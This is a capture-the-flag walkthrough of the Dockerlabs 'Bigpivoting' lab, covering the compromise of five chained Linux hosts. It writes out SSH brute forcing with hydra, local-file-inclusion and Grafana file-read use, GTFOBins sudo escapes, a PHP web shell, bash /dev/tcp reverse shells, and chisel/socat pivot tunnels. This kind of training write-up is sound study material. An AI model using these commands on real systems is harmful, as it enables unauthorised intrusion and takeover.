Bigpivoting

September 22, 2024

---

Created by	Page	Difficulty	OS
El pingüino de Mario	Dockerlabs	Hard	Linux

---

• 10.10.10.2 (Victim 1)

  • We start with a scan of the open ports

      nmap -p- -vvv -sS --min-rate 5000 -Pn 10.10.10.2 -oG scan
    

    

  • Scanning open ports

      nmap -p22,80 -sCV 10.10.10.2 -oN ports
    

    

  • We enter the website

    

  • We check the technologies being used by the web application

      whatweb 10.10.10.2
    

    

  • We perform fuzzing to try to find directories

      gobuster dir -u http://10.10.10.2/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
    

    

  • We access the website http://10.10.10.2/shop/

    

  • It seems that the web page has a parameter with which we can try to load a local file (LFI)

    

  • With the absolute path it does not load anything. When trying with relative paths we managed to load files

    

  • We discovered two users, seller and manchi. We make a brute force attack to try to connect via ssh with one of these users

  • With the user seller we could not get his password but with manchi we could

      hydra -l manchi -P /usr/share/wordlist/rockyou.txt ssh://10.10.10.2
    

    

  • we connected via ssh and after searching for a while for ways to escalate our privileges we found nothing. We tried to brute force with the user seller Sudo_BruteForce

      ./Linux-Su-Force.sh seller rockyou.txt
    

    

  • We connect as seller and list the commands that we can execute as sudo without providing a password

      sudo -l
    

    

  • We search in gtfobins for ways to escalate privileges with sudo php and become root GTFOBins

      CMD="/bin/sh"
      sudo php -r "system('$CMD');"
    

    

  • We find out which ips this computer has ‘hostname -I’. We apply a reconnaissance to see what other hosts are on network 20.20.20.0/24

      #!/bin/bash
            
      for i in $(seq 1 254); do
      	for port in 21 22 80 443 445 8080; do
      		timeout 1 bash -c "echo '' > /dev/tcp/20.20.20.$i/$port" &>/dev/null && echo "[+] Host 20.20.20.$i - PORT $port - OPEN" &
      	done
      done; wait
            
    

    

  • We create a tunnel between the two machines using chisel

      #Execute this from your machine
      ./chisel server --reverse -p 1234
            
      #Execute this from the 10.10.10.2 machine
      ./chisel client 10.10.10.1:1234 R:1080:socks
    

    

    

    • Add in /etc/proxychains4.conf the following line

        socks5 127.0.0.1 1080
      

• 20.20.20.3 (Victim 2)

  • We scanned the 5000 most common ports.

      proxychains4 nmap -sT -Pn --top-ports 5000 -open --min-rate 5000 -vvv -n 20.20.20.3 2>/dev/null
    

    

  • As we see that you have a web service on port 80, we perform an enumeration and find a maintenance.html file.

      gobuster dir -u http://20.20.20.3/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 5 --proxy socks5://127.0.0.1:1080 -x .php,.txt,.html,.py
    

    

  • We access the page defining a proxy and see a potential user

    

    

  • We connect via ftp with user anonymous without providing a password, find a kdbx file and download it

    

  • I try to get the hash with keepass2john to crack it but I can’t

    

  • I see a port 3000 open, I connect via web and find Grafana exposed with an outdated version.

    

  • After searching in searchsploit I find a script that allows to read internal files of the machine (LFI). I display the content with the path indicated by the web server on port 80 (/tmp/pass.txt).

    

    

    

  • We use the password found to view the contents of the .kdbx file. We see the password of the user freddy

    

  • We connect as freddy and list the commands that we can execute as sudo without providing a password

    

    

  • We see that we can execute a python file without providing a password. We have permissions to modify the file, so we modify it to spawn a shell as root.

      import os
      os.system("/bin/bash")
    

    

    

  • We apply a reconnaissance to see what other hosts are on network 30.30.30.0/24

      #!/bin/bash
            
      for i in $(seq 1 254); do
      	for port in 21 22 80 443 445 8080; do
      		timeout 1 bash -c "echo '' > /dev/tcp/30.30.30.$i/$port" &>/dev/null && echo "[+] Host 30.30.30.$i - PORT $port - OPEN" &
      	done
      done; wait
            
    

    

    

  • We create a tunnel between the three machines using chiseland socat

      #Execute this from the 20.20.20.3 machine
      ./chisel client 20.20.20.2:4237 R:8888:socks
            
      #Execute this from the 10.10.10.2 machine
      ./socat TCP-LISTEN:4237,fork TCP:10.10.10.1:1234
    

    

    

    • Add in /etc/proxychains4.conf the following line

        socks5 127.0.0.1 8888
      

• 30.30.30.3 (Victim 3)

  • We scanned all the ports.

      seq 1 65535 | xargs -P 500 -I {} proxychains nmap -sT -Pn -p{} -open -T5 -v -n 30.30.30.3 2>&1 | grep "tcp open"
    

    

  • As we see that you have a web service on port 80, we perform an enumeration and find a secret.php file.

      proxychains4 gobuster dir -u http://30.30.30.3 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --proxy socks5://127.0.0.1:8888 -x .php,.txt,.html,.bak
    

    

  • We access the page defining a proxy and see a potential user

    

  • We make a brute force attack to try to connect via ssh

      proxychains hydra -l mario -P /usr/share/wordlist/rockyou.txt ssh://30.30.30.3 2>/dev/null
    

    

  • We connect via ssh and see what commands you can execute as sudo without providing a password

    

  • We search in gtfobins for ways to escalate privileges with sudo vim and become root

      sudo vim -c ':!/bin/sh'
    

    

  • We create a tunnel between the three machines using chisel and socat

      #Execute this from the 30.30.30.3 machine
      ./chisel client 30.30.30.2:9998 R:9999:socks
            
      #Execute this from the 20.20.20.2 machine
      ./socat TCP-LISTEN:9998,fork TCP:20.20.20.2:9997
            
      #Execute this from the 10.10.10.2 machine
      ./socat TCP-LISTEN:9997,fork TCP:10.10.10.1:1234
    

    

    

    

    • Add in /etc/proxychains4.conf the following line

        socks5 127.0.0.1 9999
      

• 40.40.40.3 (Victim 4)

  • We scanned all the ports.

      seq 1 65535 | xargs -P 500 -I {} proxychains nmap -sT -Pn -p{} -open -T5 -v -n 40.40.40.3 2>&1 | grep "tcp open"
    

    

  • We try to upload a php file with which we can execute commands (RCE)

    

      <?php 
      	system($_GET['cmd']);
      ?>
    

  • we find where the file we have just uploaded is located and see that we can execute the following commands

    

  • We create a tunnel so that when doing a reverse shell we get to our computer.

      #Victim 1 (10.10.10.2)
      ./socat TCP-LISTEN:6662,fork TCP:10.10.10.1:6666
            
      #Victim 2 (20.20.20.3)
      ./socat TCP-LISTEN:6661,fork TCP:20.20.20.2:6662
            
      #Victim 3 (30.30.30.3)
      ./socat TCP-LISTEN:6666,fork TCP:30.30.30.2:6661
    

  • we make the request to create the reverse shell

    

      http://40.40.40.3/uploads/a.php?cmd=bash -c "bash -i >%26 /dev/tcp/40.40.40.2/6666 0>%261"
    

    

  • We connect as www-data and list the commands that we can execute as sudo without providing a password

    

  • We search in gtfobins for ways to escalate privileges with sudo env and become root

      sudo env /bin/sh
    

    

  • We create a tunnel between the three machines using chisel and socat

      #Execute this from the 40.40.40.3 machine
      ./chisel client 40.40.40.2:7776 R:7777:socks
            
      #Execute this from the 30.30.30.3 machine
      ./socat TCP-LISTEN:7776,fork TCP:30.30.30.2:7775
            
      #Execute this from the 20.20.20.2 machine
      ./socat TCP-LISTEN:7775,fork TCP:20.20.20.2:7774
            
      #Execute this from the 10.10.10.2 machine
      ./socat TCP-LISTEN:7774,fork TCP:10.10.10.1:1234
    

    

    

    

    

    

    • Add in /etc/proxychains4.conf the following line

        socks5 127.0.0.1 7777
      

• 50.50.50.3 (Victim 5)

  • We scanned all the ports.

      seq 1 65535 | xargs -P 500 -I {} proxychains nmap -sT -Pn -p{} -open -T5 -v -n 50.50.50.3 2>&1 | grep "tcp open"
    

    

  • As we see that you have a web service on port 80, we perform an enumeration and find a warning.html file.

      gobuster dir -u http://50.50.50.3/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 5 --proxy socks5://127.0.0.1:7777 -x .php,.txt,.html,.py
    

    

  • We access the page defining a proxy and see a potential user

    

    

  • By brute force I try to get the parameter used by the rever shell

      proxychains wfuzz -c -t 50 --hh=0 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt "http://50.50.50.3/shell.php?FUZZ=whoami" 
    

    

  • We create a tunnel so that when doing a reverse shell we get to our computer.

      #Victim 1 (10.10.10.2)
      ./socat TCP-LISTEN:6662,fork TCP:10.10.10.1:6666
            
      #Victim 2 (20.20.20.3)
      ./socat TCP-LISTEN:6661,fork TCP:20.20.20.2:6662
            
      #Victim 3 (30.30.30.3)
      ./socat TCP-LISTEN:6660,fork TCP:30.30.30.2:6661
            
      #Victim 3 (40.40.40.3)
      ./socat TCP-LISTEN:6666,fork TCP:30.30.30.2:6660
    

  • we make the request to create the reverse shell

      http://50.50.50.3/uploads/a.php?cmd=bash -c "bash -i >%26 /dev/tcp/50.50.50.2/6666 0>%261"
    

    

  • I do a search and find a hidden file that contains a password, I try it with root and I manage to escalate privileges.